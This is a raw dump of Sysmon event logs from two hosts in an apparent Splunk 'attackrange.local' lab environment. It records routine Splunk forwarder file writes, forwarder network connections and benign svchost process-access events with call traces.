Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8D0FCC1D614AED1DE76602E57B5D9947,SHA256=B703BFA1F49EB64B6FC9B163A4B509A0050E543030DB219C77C29240DD61333C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081289Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:08.041{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=39F467DAA6E423BC479BFD7C53008789,SHA256=D0413C5C62318933348B58E838F2298F5DBE4332C2156F792B2912FB0C492B01,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000103410Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:06.340{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49518-false10.0.1.12-8000- 23542300x8000000000000000103412Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:09.667{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0DCC3A9D32F3D294B42A672E0A906EB5,SHA256=16A1A6483E3C36CA126103D6A9BDF7DB383613A7B7FBDC8126F867FC766DE7F4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081290Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:09.041{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7557E17C913950FA84DD2ADEDE532558,SHA256=3862EF8DC829CD28A3EA8BE7F8B434605E0C780DD4A67649F2ABE24AC0FBF6B7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103413Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:10.682{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=20D2F684BFFB9D7FD890AC88E2683760,SHA256=6050321BB71EB13C9F868212C7DCF8EE32DAABA6CF8693FCDA623BA355C84A8F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081291Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:10.041{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D2F952784BD7AD106D7DFA5016190A3C,SHA256=98DD207D08E4103A72ACDA04A044E346E4716DE6B590D7206D62874C836C9549,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103414Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:11.682{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EED1833A94424D9839EB07E7DDB74FF1,SHA256=F28AD4D3FF17DA934A16855486C6C0FDA7B6FCFF2FB11825E44997C4F21B2396,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000081293Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:09.734{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50018-false10.0.1.12-8000- 23542300x800000000000000081292Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:11.041{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9D15479F30E992CF4C0C46A9D70AD6DB,SHA256=AA1EFED14234913E719C4B5190A6BF2C951690C0B7A20986A1307F57C5F5C438,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103415Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:12.682{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A57DF4C92DEC55B858AABC035FEAA440,SHA256=B56068EBE9DF5FD362241C6E901500022D6BE4A78A1328AD7A1573CDED093331,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081294Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:12.041{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=42DAC18083385587D112EF0F11180869,SHA256=33C0CB6565F7E05A7644C50E5CF081126DEB23555C4FCD6375D1C8EA97575E35,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103416Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:13.682{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=323D6D2730A1F9A253F0F58AEB1C1E6B,SHA256=FB5FF7E9745E12BAB91B362170D6E232FCE770B355366B8267D37CED2531010E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081295Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:13.041{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=86FA1997AFADCBFFDF45FB5093D1FFB0,SHA256=FF5C5D478FC3AAA0EC9A811DB3B0CF8D6B864E6DA70C0554F4C17D8B26CB1551,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103418Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:14.698{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=389D221A44081352CE319CFA42059DB6,SHA256=1DF23E7253DD0EAFF74E9896CAF7D52E8D9294A86C78BB84DB4EC96C888E1EB0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081296Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:14.041{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=973AF5270E6D7634C82EECB32C16AA6F,SHA256=AABABBF18E9680E5245116EBFAE118C060A9E1A636B5B5DBF44616EB1237BA05,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000103417Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:12.340{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49519-false10.0.1.12-8000- 23542300x8000000000000000103419Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:15.698{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BAB99175211B633C45F2DEDA456B4739,SHA256=EBFC8AA6240812B97723E23E15007AE6642B7F2E49FC0465A562440FDF9FBB75,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081297Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:15.041{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DF5F6EB32B701E715FC16AA5EA2B7740,SHA256=F08BBA3214BB66FC2DE4B7E6D16BDFCA9DE27F49B8684F5957E78C729210DDAC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103420Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:16.712{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=30C8C5381F387355678D853D8A449B5A,SHA256=8392C840033A67A1578A6730B1332AFF96E37ECCFC298E5786CABCEF3A51F560,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081298Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:16.055{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3ACFBD017C47BDA8679C0E9CE249F736,SHA256=75FACCD4E414FAF3D52D5615EB894D843B05E130AE31B30025B32D8999E9BA43,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103421Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:17.712{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DD679FBA534BEC666467835F8ADD0C9D,SHA256=DDCF2BC223253137AA72CC76AE5DFC0CFFC7A43B6F9BFFA99C8BEC53677662FC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081299Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:17.055{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5453BAB984C9336990482DFB9238EE5F,SHA256=4B5828C6B49CB0E613AF251BB8D4EDBDCE004E97DD09D5264F138A43521A27A1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103422Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:18.728{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=526A9B0FF7D0E1A4E2B825C763304F40,SHA256=AEF2F899B55BD2556B1C19A656E2CB3C348686DCE7DC5B6BC4CEA611DC41B034,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081302Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:18.977{2FDD8D40-AC9A-615A-1200-00000000FD01}996NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=D404B35E2CE513C05695CFE244417242,SHA256=E1C6FDBEC79F5487838FF80C6196BFCA7E135F4A5E131D898435C7031EFB3D8A,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000081301Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:15.638{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50019-false10.0.1.12-8000- 23542300x800000000000000081300Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:18.055{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D7C7762EED29C7225D69FB109CCCEA68,SHA256=EA49B68D2E6ABBBFF4231C33858633E0F7ECF98AF95AD28FE4FB91440AA0E87B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103424Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:19.728{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9905AD61E32FEB02971D9C786B61CAAD,SHA256=087D9C5E09E458AC0C82A034783C0031B954820D019C37E4050978AD1665FEA4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081303Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:19.070{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F964FF5C86AEFB617C9D662C356C7B99,SHA256=4F58659329DAB5DADA441ADDB077BCAAFDFBC9CDF102B45CB2A1B10477A2D272,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000103423Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:17.371{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49520-false10.0.1.12-8000- 23542300x8000000000000000103426Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:20.729{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=019680160E4F160CAB85E39836BEF1C5,SHA256=3457BF95B76D4672A38C57265B48226A8C4653652F2B7316337B9CFE3911C7F3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103425Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:20.716{58E9C193-ACB4-615A-2800-00000000FC01}2932NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0820d8563ae6a39aa\channels\health\respondent-20211004072647-022MD5=53085563A3ABB9F3808759992432B215,SHA256=10E8415EFF195E3F3A29733AD6341E818F88D003F4EF1749654882A61D67B63B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081304Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:20.070{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE21AB1BBE364E2D352FDD127EA35BCD,SHA256=C346C8A52D375DD57467749A8C6DF9CC7D677B727D165BE5540C341EADAA5A60,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103428Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:21.731{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6F1C6E7A4421BF9C8221B8484CEDDAE2,SHA256=0A99E51C501399AC052DD10122EF497BC35A375E86DD7DF015C9754F99500450,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103427Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:21.730{58E9C193-ACB4-615A-2800-00000000FC01}2932NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0820d8563ae6a39aa\channels\health\surveyor-20211004072645-023MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081305Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:21.070{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=29FEFAF02FB1D408D943ECB279C33CC0,SHA256=1B8BCE9E9B0A0DF52DFB3A1D2B9099C82F033F77C23E7DABFB90A601E3D62B42,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103429Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:22.779{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=78F0BDF03DFFDBFFDEBE6FDF51E8A325,SHA256=7077BDB3C00BE2F14B528D0E610F0B41AFC42621D73877444B7063451B7D406B,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000081307Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:20.639{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50020-false10.0.1.12-8000- 23542300x800000000000000081306Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:22.070{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=26CA2D332C068358D3013C7EA155E6EC,SHA256=0F650A099482E59A58FEC5A7C97DE31C5C2EB45B0361C555F7590513F943329F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103430Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:23.810{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D61B8BD4F1779EFA4CE23AC312BC5B67,SHA256=112E08BDEF7B91F38B867F3F345AE6BA2F2C1A26E074F4601EBA0F3355AAFF7A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081308Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:23.164{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2D83DA274688388095C589EA6961C80F,SHA256=4B475B114890B6B823996EE8AA37E5A92250F70DDDF92F8FDFDD31192D3D8A8C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103432Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:24.826{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=993C2477BF0F885E615467F582ACA479,SHA256=DBA55011BA4F093D2821ECB4DF624F6DD0A7B11D36FA995F8F39A2C7157FC241,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081309Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:24.180{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=16B1A157DB9D58A6B1C6771AE2C046A5,SHA256=9E29CF559131DBDA70439455297C40361D720A8FD8F65CF24529166231551B5F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000103431Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:23.297{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49521-false10.0.1.12-8000- 10341000x8000000000000000103462Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:25.857{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-CA00-00000000FC01}4172C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103461Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:25.857{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-CA00-00000000FC01}4172C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103460Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:25.857{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE76-615A-DB00-00000000FC01}5140C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103459Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:25.857{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE76-615A-DB00-00000000FC01}5140C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103458Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:25.857{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE76-615A-DB00-00000000FC01}5140C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103457Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 